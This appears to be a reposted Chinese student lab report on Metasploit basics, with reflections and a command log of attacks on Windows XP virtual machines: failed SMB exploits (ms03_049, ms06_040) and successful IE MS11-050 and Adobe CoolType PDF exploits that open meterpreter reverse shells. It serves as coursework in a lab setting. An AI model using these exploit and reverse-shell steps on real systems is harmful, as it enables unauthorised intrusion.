您的位置:首页 > 理论基础 > 计算机网络

20145337《网络对抗技术》MSF基础应用

2017-04-17 21:30 162 查看

20145337《网络对抗技术》MSF基础应用

一、实验后回答问题

什么是exploit、payload、encode

Metasploit这种模块化的设计,大大提高了代码的复用率。exploit(渗透攻击模块)利用漏洞或者配置弱点对目标进行攻击,payload(攻击载荷模块)作为一种手段,exploit通过填入和运行攻击载荷,获得远程的访问权限。encode(编码器模块)是工具之一,也是渗透攻击的一重保障——避免坏字符、使攻击载荷免杀。这3个模块是渗透攻击的核心,相辅相成。

二、实验总结与体会

通过这次实验,我学会了修改kali的IP,然后就能ping通了



为了和别的同学做不同的主动攻击,下载了4、5个虚拟机,通过这次实验,我学会了在虚拟机中装XP系统。实验的成功与否,有很多不确定的因素,比如中英文版本啊,可能我下载的虚拟机事先打好了补丁啊(虽然它写着原始版和纯净版)

这次实验很有意思,系统漏洞不容小觑,稍加利用就能变成渗透攻击的手段。对渗透攻击有了更深入的了解,最后要立一个FLAG,改掉拖延症

三、实验过程记录

ms03_049、ms06_040主动攻击

大家都做ms08_067,想找一个和大家不一样的.查了一下WinXPSP3,除了这个漏洞,其他漏洞像拒绝服务漏洞、任意写入权限提升漏洞太难操作了。



尝试了ms03_049、ms_06_040(本来想做killbill,因为电影挺好看,然鹅并没有符合条件的靶机)

这里的靶机是Win XP Professional原版

输入msfconsole进入msf,search一下



进入该漏洞模块的使用(use exploit/windows/smb/ms03_049_netapi)

show payload,找到一个比如shell_reverse_tcp;show targets





设置攻击有效载荷(set payload generic/shell_reverse_tcp)、show options并设置相关数据



输入exploit开始攻击



建立不了联接?关闭防火墙试试?还是不行



又试了ms06_040

真的做了挺多回,本来以为召唤盾牌就能成功的,看到坦克依然不成功,就发现自己想的太简单









也没成功,希望老师不要扣分,我毕竟和大家的主动攻击不一样呀(O_O),连不通我也很绝望

IE浏览器渗透攻击——MS11050安全漏洞

开启msfconsole,输入use exploit/windows/browser/ms11_050_mshtml_cobjetelement

输入info查看信息:



设置对应的载荷set payload windows/meterpreter/reverese_tcp;

show options查看需要设置的相关信息:

设置相关信息:set LHOST ‘kali Ip’、 set LPORT 5337、 set URIPATH baidu



exploit,有靶机需要访问的ip地址:

在靶机IE上输入网址,并在靶机上查看信息。







可以看见kali中显示一个session 1已经创建;

输入命令sessions -i 1,开始连接,输入shell成功获取shell



Adobe阅读器渗透攻击

开启msfconsole、输入命令use exploit/windows/fileformat/adobe_cooltype_sing

使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,show options



输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。



使用use exploit/multi/handler新建一个监听模块



使用set payload 建立一个反向连接,设置set LPORT 5337



使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。

输入shell获取靶机信息



在靶机xp中使用命令netstat -an,看本地tcp连接



辅助模块

本来尝试了书上的“开放代理探测与应用”,但是run不起来





枚举系统上的用户



内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: